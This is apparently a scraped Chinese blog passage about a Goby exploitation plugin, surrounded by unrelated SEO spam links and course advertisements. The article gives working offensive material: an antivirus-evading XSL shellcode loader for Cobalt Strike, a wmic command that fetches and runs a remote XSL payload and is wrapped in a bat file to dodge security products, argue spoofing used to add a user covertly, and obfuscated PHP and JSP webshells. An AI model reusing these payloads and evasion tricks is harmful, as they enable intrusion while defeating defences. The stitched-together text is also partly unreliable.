当前位置: 首页 > news >正文

传媒类网站模板青岛网站建设公司排名

传媒类网站模板,青岛网站建设公司排名,优化方案物理必修一答案,做网站都用什么语言网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。 需要这份系统化的资料的朋友,可以添加戳这里获取 一个人可以走的很快,但一群人才能走…

img
img

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化的资料的朋友,可以添加戳这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

        this.data = JSON.parse(this.fs.readFileSync(config_info, 'utf-8'));//返回应该是json类型可以后面直接用return this.data;}//点击按钮时获取你点击的漏洞详情getPOCInfo(vulname, proxystr) {this.init();//进行发包操作获取Goby本地的返回包,其中有漏洞详情,json类型进行后面处理return new Promise((resolve, reject) => {//发包配置一系列的参数this.request({url: `http://${this.host}:${this.port}/api/v1/getPOCInfo`,method: 'POST',auth: {'user': this.username,'pass': this.password,},proxy: proxystr,json: { "vulname": vulname}}, function (error, response, body) {//成功过后会进行返回漏洞详情if (!error && response.statusCode == 200) {//成功状态获取返回值resolve(body);} else {//失败状态返回错误详情reject(error)}});})}//发包利用漏洞,主要用来更改exp的参数debugExp(post\_data, proxystr) {this.init();//进行发包操作和本地Goby进行交互,利用更改exp的值进行利用return new Promise((resolve, reject) => {//发包构造一系列参数this.request({url: `http://${this.host}:${this.port}/api/v1/debugExp`,method: 'POST',auth: {'user': this.username,'pass': this.password,},proxy: proxystr,json: post_data}, function (error, response, body) {if (!error && response.statusCode == 200) {//输出返回的内容// console.log(body);resolve(body);} else {reject(error)}});})}}

//构造Gexp类结束


### 2.4 它们自己#### 2.4.1 GoPass.html 用来生成免杀 xsl 文件这个文件主要就是将 bin 文件进行 base64 加密后和 xsl 文件进行拼接,生成一个 GoPass.xsl 文件,供后面进行远程加载。Xsl 文件的是使用 cactusTorch 作为加载器加载 shellcode,再运用 wmic 进行远程不落地执行 shellcode。由于无文件落地的木马可以附加到任何进程里面执行,而且传统安全软件是基于文件检测的,对目前无文件落地木马检查效果差,所以该插件采用了此形式进行上线 CS。而原版本的 xsl 文件生成后就会被杀软报毒,那么加入 <!----> 注释符号进行简单免杀绕过,此处只绕过基本的杀软。![在这里插入图片描述](https://img-blog.csdnimg.cn/86270a0fda184b61a28ac56aabf53b45.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzQ2Njk5NDc3,size_16,color_FFFFFF,t_70#pic_center)  同时在重要函数名上也如此。![在这里插入图片描述](https://img-blog.csdnimg.cn/79bd54de43fd4cac876f30ad7a0fc70c.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzQ2Njk5NDc3,size_16,color_FFFFFF,t_70#pic_center)此处只讨论静态免杀,在 vt 上效果如下。![在这里插入图片描述](https://img-blog.csdnimg.cn/65110934c2c14bd29f8ec53f041c0cd0.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzQ2Njk5NDc3,size_16,color_FFFFFF,t_70#pic_center)效果是不够的好,加入 <!----> 如同 P 图,P 得越多,越… 根据上面的绕过举一反三过后的免杀如下。![在这里插入图片描述](https://img-blog.csdnimg.cn/31a9877067ac4717a8f735bb09e63298.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzQ2Njk5NDc3,size_16,color_FFFFFF,t_70#pic_center)这几个感觉是执行了文件,只把一个字母大写,代码不能执行了它们就不报毒了,所以后期还需要加强免杀。![在这里插入图片描述](https://img-blog.csdnimg.cn/7adea123e5184120a0f0aeed702b4c66.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzQ2Njk5NDc3,size_16,color_FFFFFF,t_70#pic_center)#### 2.4.2 index.html 用来生成漏洞利用上线 CS这个文件主要用来,调用 extension.js 文件中的 Gexp 类,获取 PoC 的参数进行更改后调用 EXP 进行发包利用,其中利用方式有 RCE 和 upload 两种,文件形式有 php,asp,jsp三种(以后会加入 aspx),源码中有具体的注释。此处因为是子页面使用引入模块时必须加入 parent

let fs = parent.require(‘fs’);
let goby = parent.goby;


同时如果你使用 exec 函数调用 cmd 也是 Goby.exe 进行调用的,生成文件会在 Goby 的根目录下面,不指定目录写文件也是一样。初次写 js 的师傅注意,下拉框因为是 div 修饰过的,不能再使用原生的事件进行监听,要使用 layui 的语法进行 select 监听事件。

//select监听事件开始
//layui的监听事件和原生select不一样

layui.use([‘form’], function () {
var form = layui.form;

//下拉框改变事件开始
//layui的调用写法,因为select采用的是layui的样式使用要用它的写法不能用原生的
//id为vlul的下拉框的值改变后触发
form.on('select(vlul)', function (data) {//调用函数主要用来更新textarea中的内容changeE();
});
//id为txt的下拉框的值改变后触发
form.on('select(txt)', function (data) {//调用函数主要用来更新textarea中的内容changeE();
});
//下拉框改变事件结束

});
//select监听事件结束


以 php 为例,漏洞利用 upload 是上传写入 php 代码执行 cmd 调用 wmic 远程加载运行 shellcode,RCE 是默认可以执行系统 dos 命令的情况下,调用 wmic 进行远程加载运行 shellcode (如果是代码执行漏洞还需要自己添加 system() 之类的调用 cmd 的函数)最开始的 xsl 文件有了简单的免杀后,能不能成功上线还得看最后一步 wmic 的命令,正常 wmic 命令是 wmic os get /format:“http://yourIP/a.xsl”不用想,这肯定会被某全家桶拦截,所以我们必须绕过拦截,那么使用用到烂的 echo 加管道符 | 来试试echo os get /format:“http://yourIP/a.xsl”|wmic![在这里插入图片描述](https://img-blog.csdnimg.cn/bfdca6f5f3b249f8be86eae6803693fe.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzQ2Njk5NDc3,size_16,color_FFFFFF,t_70#pic_center)本地 cmd 执行不会被拦,但是 Upload 利用时候,写入页面后,再加载页面时候会被拦,这意外么?毫不意外。但是这里有趣的是,其实这里绕过了但是没有完全绕过,根据高级的食材往往只需简单烹饪这一道理,所以我决定简单烹饪,将它写入 bat 文件中本地执行,最后发现某全家桶毫无拦截。所以页面中不调用 wmic,而是把它写入 bat,本地去执行 wmic 这样就不会被拦截。![在这里插入图片描述](https://img-blog.csdnimg.cn/4e0dcdd6b82c4b6a9c103d8f20dafa0f.gif#pic_center)所以最后命令为 echo ^echo os get /format:“http://yourIP/a.xsl”^|wmic>>1.bat&&1.bat最后来看看在某斯基,某全家桶,某管家,某绒的监督下,不落地执行 shellcode 会是什么样子。![在这里插入图片描述](https://img-blog.csdnimg.cn/b51352899a2848e980d14d89ca3c8877.gif#pic_center)看着 6 秒没有反应,还以为是被 某斯基 杀了,结果发现没有。上线后如果执行敏感操作,如创建用户,可以考虑用 argue 参数污染。> 
> 使用参考<https://www.freesion.com/article/3342904336/>
> 
> 
> #参数污染 net

argue net xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx


#查看污染的参数

argue


#用污染的 net 执行敏感操作

execute net user test2 root123 /add


全程某全家桶是没有进行拦截的![在这里插入图片描述](https://img-blog.csdnimg.cn/b286fff718f14728b8cb52b4561dfef1.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzQ2Njk5NDc3,size_16,color_FFFFFF,t_70#pic_center)  ![在这里插入图片描述](https://img-blog.csdnimg.cn/485ac8244e444a5a964c6241dc6b82e5.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzQ2Njk5NDc3,size_16,color_FFFFFF,t_70#pic_center)原理简单来讲也如同 P 图,原本执行 net,但是污染后 command 却是 net xxxxxxxxxx,达到绕过。你在使用中肯定会遇到一些小问题,比如,wmic 加载了一个没有开放的端口就会出现![在这里插入图片描述](https://img-blog.csdnimg.cn/1fd8029287534c6a9ac356b9c7763727.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzQ2Njk5NDc3,size_16,color_FFFFFF,t_70#pic_center)那么最好的解决办法就是不去解决,等待一分钟过后就可以了,它们都会自己退出。这告诉了我们一件事情,一定记得去防火墙设置里面开放端口。![在这里插入图片描述](https://img-blog.csdnimg.cn/c33b1469fe314ea38a10b518946b08bc.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzQ2Njk5NDc3,size_16,color_FFFFFF,t_70#pic_center)讲完了 cmd 命令的绕过那么就开始 upload 中 Webshell 的绕过。Php 是参考冰蝎的回调函数进行利用的 php 语句。

let phpshell = “<?php @call_user_func(base64_decode(“c3lzdGVta”),”" + wmicCMDshell + “”);"


Jsp 基础免杀是参考的 @yzddMr6 师傅的 <https://yzddmr6.tk/posts/webshell-bypass-jsp/> 文章

let jspshell = "<%@ page contentType=“text/html;charset=UTF-8” import=“javax.xml.bind.DatatypeConverter” language=“java” %><%Class rt = Class.forName(new String(DatatypeConverter.parseHexBinary(“6a6176612e6c616e672e52756e74696d65”)));Process e = (Process) rt.getMethod(new String(DatatypeConverter.parseHexBinary(“65786563”)), String.class).invoke(rt.getMethod(new String(DatatypeConverter.parseHexBinary(“67657452756e74696d65”))).invoke(null), “” + wmicCMDshell + “”);%> ";


Asp 是简单利用的 chr 字符加大写,不能免杀,希望会 asp 的师傅能够指导一下。![img](https://img-blog.csdnimg.cn/img_convert/9dc78cbba2011e8d0f07da170904a1d5.png)
![img](https://img-blog.csdnimg.cn/img_convert/a6724d89a63b62dc665420d7a2441113.png)
![img](https://img-blog.csdnimg.cn/img_convert/cc6f08172fc7a00f3e22afaba3bdfb03.png)**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上Go语言开发知识点,真正体系化!****由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新****[如果你需要这些资料,可以戳这里获取](https://bbs.csdn.net/topics/618658159)**片转存中...(img-Wj94CncL-1715577081157)]
[外链图片转存中...(img-9MOdAv3M-1715577081157)]**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上Go语言开发知识点,真正体系化!****由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新****[如果你需要这些资料,可以戳这里获取](https://bbs.csdn.net/topics/618658159)**
http://www.tj-hxxt.cn/news/9912.html

相关文章:

  • 娱乐网站开发潍坊seo计费
  • 做网站有用吗搜索引擎优化seo的英文全称是
  • 网站和微信订阅号优势seo教程免费
  • 大众服务器网站优化百度百科
  • 移动网站系统百度一直不收录网站
  • 2023年8月上海疫情爆发南昌关键词优化软件
  • 网站后台如何更改高端网站建设专业公司
  • 解析软件的网站关键词都有哪些
  • 手机网站公司北京网上推广
  • 郑州企业网站优化服务哪家好我赢网提供的高水平网页设计师
  • 党建网站建设自查报告营销型网站建设推广
  • WordPress手机导航登陆代码做网站排名优化的公司
  • 专业的企业智能建站制造厂家普通话手抄报简单又漂亮
  • 信阳网站设计河南百度seo
  • 17一起做网店网站潮汕网络推广公司运作
  • 常州哪家网站建设公司专业推广网站seo
  • 西安网站建设工作室seo推广视频隐迅推专业
  • 盐城网站建设方案黄冈网站推广软件免费下载
  • 电子商务网站开发方式百度seo指数查询
  • 长春网站建设找新生科技深圳专门做seo的公司
  • 做外国网站百度搜到模板建网站价格
  • 怎么免费给网站做收录网站seo优化推广外包
  • 做网站logo用啥软件石家庄seo
  • 建设制作外贸网站的公司百度地图网页版
  • 商品展示网站模板源码最有效的恶意点击
  • 做网站和开发app有什么不同怎么进行推广
  • 做一个小网站多少钱seo课程排行榜
  • 网站建设明细报价单青岛谷歌优化
  • 华为云建网站网络运营推广是做什么的
  • 免费crm软件东莞营销网站建设优化